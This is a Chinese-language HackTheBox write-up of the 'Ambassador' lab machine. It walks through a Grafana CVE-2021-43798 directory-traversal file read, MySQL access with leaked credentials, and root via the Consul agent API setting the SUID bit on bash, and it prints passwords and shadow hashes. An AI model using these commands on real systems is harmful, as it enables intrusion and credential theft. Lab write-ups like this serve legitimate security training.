Ambassador - HackTheBox

基本信息

• https://www.hackthebox.com/home/machines/profile/499

• 10.10.11.183

端口扫描

22,80,3000,3306:

$ nmap -sC -sV -Pn 10.10.11.183
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-09 09:54 CST
Nmap scan report for 10.10.11.183
Host is up (0.23s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
|   256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
|_  256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Ambassador Development Server
|_http-generator: Hugo 0.94.2
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Content-Type: text/html; charset=utf-8
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 09 Oct 2022 01:56:08 GMT
|     Content-Length: 29
|     href="/login">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 302 Found
|     Cache-Control: no-cache
|     Expires: -1
|     Location: /login
|     Pragma: no-cache
|     Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: deny
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 09 Oct 2022 01:56:14 GMT
|_    Content-Length: 0
3306/tcp open  mysql   MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
|   Protocol: 10
|   Version: 8.0.30-0ubuntu0.20.04.2
|   Thread ID: 10
|   Capabilities flags: 65535
|   Some Capabilities: SupportsLoadDataLocal, InteractiveClient, ODBCClient, LongPassword, Speaks41ProtocolOld, SupportsCompression, DontAllowDatabaseTableColumn, SwitchToSSLAfterHandshake, LongColumnFlag, Speaks41ProtocolNew, IgnoreSigpipes, Support41Auth, SupportsTransactions, IgnoreSpaceBeforeParenthesis, FoundRows, ConnectWithDatabase, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: J:BgUq\x0C.((lQ\x13N*,#p 7
|_  Auth Plugin Name: caching_sha2_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=7%D=10/9%Time=63422A37%P=x86_64-apple-darwin21.5.
SF:0%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-
SF:Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\
SF:nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Co
SF:okie:\x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-
SF:Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-P
SF:rotection:\x201;\x20mode=block\r\nDate:\x20Sun,\x2009\x20Oct\x202022\x2
SF:001:56:08\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">
SF:Found</a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\
SF:r\nCache-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\
SF:r\nPragma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x2
SF:0HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-F
SF:rame-Options:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:
SF:\x20Sun,\x2009\x20Oct\x202022\x2001:56:14\x20GMT\r\nContent-Length:\x20
SF:0\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
SF:r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\
SF:x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnecti
SF:on:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"
SF:HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20c
SF:harset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(T
SF:LSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x2
SF:0text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad
SF:\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.84 seconds

80

一个博客，直接说了devops获取密码：

3000

Grafana v8.2.0：

Grafana-CVE-2021-43798

很容易搜到这个相关漏洞：

• Grafana 8.3.0 - Directory Traversal and Arbitrary File Read - CVE-2021-43798 | VK9 Security
  https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/
• jas502n/Grafana-CVE-2021-43798: Grafana Unauthorized arbitrary file reading vulnerability
  https://github.com/jas502n/Grafana-CVE-2021-43798

/etc/grafana/grafana.ini

直接读取grafana配置文件，得到grafana admin密码,并且可以看到secret被注释掉了：

admin_password = messageInABottle685427

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

/var/lib/grafana/grafana.db

grafana.db也可以下载下来，这个没启用加密，直接查看即可：

curl --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

sqlite3 grafana.db
sqlite> .tables

sqlite> select * from data_source;
2|1|1|mysql|mysql.yaml|proxy||dontStandSoCloseToMe63221!|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2022-10-09 01:49:40|0|{}|1|uKewFgM4z

mysql

使用得到的账号密码连接mysql查看信息，获取到developer用户密码：

mycli -h 10.10.11.183 -u grafana -pdontStandSoCloseToMe63221!

show databases;
use whackywidget;
show tables;
+-----------+------------------------------------------+
| user      | pass                                     |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+

$ echo "YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==" | base64 -d
anEnglishManInNewYork027468

user flag

developer用户ssh登录，得到user flag:

提权信息

/opt/my-app目录下，查看git历史，可以得到一个consul token：

developer@ambassador:/opt/my-app$ git show
...
-consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
...

另外可以搜索到consul相关漏洞：

• Hashicorp Consul Remote Command Execution via Services API - Metasploit - InfosecMatter
  https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/misc/consul_service_exec
• metasploit-framework/consul_service_exec.rb at master · rapid7/metasploit-framework
  https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/consul_service_exec.rb

提权 & root flag

根据msf模块代码构造curl命令调用api，执行任意命令。例如执行一个给bash加suid的sh文件：

(也可以把8500端口转发出来，然后直接用msf打)

echo 'chmod +s /usr/bin/bash' > /tmp/e.sh

curl --header "X-Consul-Token: bb03b43b-1d81-d62b-24b5-39540ee469b5" --request PUT -d '{"ID": "miao", "Name": "miao", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/e.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register

/usr/bin/bash -p

shadow

root:$6$AY/Hqk/PJgettbhs$mgg2hluJ8.leTpnrlEkh4RF7qE6Ns9j/TtV3Sx5OIsZ2YEA0OjGsJpmQlX2CFMmbwNjmvCZy9/Rcea4nF799V0:19065:0:99999:7:::
developer:$6$Qn1mw/0Al3UAi/qx$sBdXWTZE22UeJPw1iTYMb69LNMGbk9eZYj7o1H55rE9QB.t47TB6pOoOTf4ZfVSngS3aSK.CpANtRUM1hcAiG/:19237:0:99999:7:::

参考资料

• Grafana 8.3.0 - Directory Traversal and Arbitrary File Read - CVE-2021-43798 | VK9 Security
  https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/
• jas502n/Grafana-CVE-2021-43798: Grafana Unauthorized arbitrary file reading vulnerability
  https://github.com/jas502n/Grafana-CVE-2021-43798
• Hashicorp Consul Remote Command Execution via Services API - Metasploit - InfosecMatter
  https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/misc/consul_service_exec
• metasploit-framework/consul_service_exec.rb at master · rapid7/metasploit-framework
  https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/consul_service_exec.rb
• Ambassador - HTB [Discussion] | BreachForums
  https://breached.to/Thread-Ambassador-HTB-Discussion
• HackTheBox (HTB) Writeup: Ambassador [Medium] – meowmeowattack
  https://meowmeowattack.wordpress.com/2022/10/03/hackthebox-htb-writeup-ambassador-medium/